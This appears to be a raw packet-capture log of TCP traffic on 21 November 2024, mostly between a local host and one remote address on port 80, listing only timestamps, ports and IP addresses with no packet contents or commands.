                                                                                                                                                                      Nov 21, 2024 06:23:41.182735920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.182976961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.183021069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.183032990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.183067083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.183921099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.183968067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.183979988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.183995962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.184031963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.184947014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.184961081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.184973001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.185026884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.185820103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.185842991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.185863972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.185893059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.185934067 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.186773062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.186827898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.186837912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.186899900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.187716007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.187740088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.187751055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.187781096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.187824011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.188668013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.188715935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.188728094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.188781977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.189640045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.189692020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.189703941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.189708948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.189743042 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.190588951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.190614939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.190625906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.190711975 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.191515923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.191567898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.191579103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.191582918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.191689014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.192497969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.192542076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.192553043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.192640066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.193419933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.193463087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.193475008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.193483114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.193525076 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.194390059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.194437981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.194449902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.194516897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.195379019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.195391893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.195403099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.195466042 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.196270943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.196296930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.196307898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.196352959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.197225094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.197262049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.197273016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.197313070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.197336912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.198196888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.198237896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.198250055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.198308945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.199093103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.199166059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.199398994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.199435949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.199446917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.199603081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.200330019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.200371981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.200382948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.200424910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.201239109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.201286077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.201298952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.201349020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.202213049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.202225924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.202238083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.202255011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.202295065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.203039885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.259073019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.270394087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.270409107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.270464897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.270489931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.270553112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.270564079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.270590067 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.270617962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.270705938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.271284103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.271353006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.271363974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.271373987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.271440029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.272053957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.272100925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.272111893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.272151947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.272221088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.272260904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.272809982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294418097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294445038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294456959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294470072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294507980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.294727087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294749022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294759035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.294771910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.294801950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.295258999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.295321941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.295334101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.295373917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.295418978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.295519114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.296044111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296078920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296089888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296149015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.296166897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296211004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.296818018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296859980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296871901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.296907902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.296969891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.297017097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.297619104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.297667027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.297677994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.297719002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.297765970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.298383951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.298432112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.298443079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.298486948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.298542023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.298772097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.299169064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.299189091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.299201965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.299245119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.299267054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.299417973 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.299963951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300012112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300035954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300095081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300105095 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.300141096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.300761938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300772905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300784111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300820112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.300892115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.300935984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.301527977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.301587105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.301598072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.301662922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.301677942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.301817894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.302293062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.302346945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.302356958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.302369118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.302406073 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.302453041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.303078890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.303128004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.303139925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.303193092 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.303217888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.303292036 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.303868055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.303942919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.303955078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304028034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.304056883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304069042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304135084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.304862022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304898977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304908991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.304909945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304941893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304948092 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.304951906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.304989100 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.305811882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.305860043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.305871964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.305982113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.305994034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.306036949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.306766033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.306811094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.306822062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.306823015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.306864977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.306931973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.306942940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.306982040 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.307748079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.307789087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.307800055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.307827950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.307905912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.307917118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.307956934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.308705091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.308727980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.308737993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.308783054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.308803082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.309371948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.309434891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.309446096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.309520006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.309530973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.309552908 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.310231924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.310252905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.310264111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.310308933 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.344701052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.344753981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.344773054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.344806910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.344856024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.344868898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.344916105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.345146894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.345323086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.345396996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.421206951 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.422087908 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.422120094 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.422497034 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:41.422503948 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.462693930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.462735891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.462754965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.462768078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.462779045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.462784052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.462831974 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.463088989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463129044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463140965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463201046 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.463618994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463660955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463673115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463738918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.463848114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463860989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.463912964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.464562893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.464858055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.486438036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.486469984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.486483097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.486540079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.486552000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.486572981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.486648083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.486856937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.486968994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487077951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.487159014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487217903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487230062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.487263918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.487646103 CET8049762185.215.113.16192.168.2.6
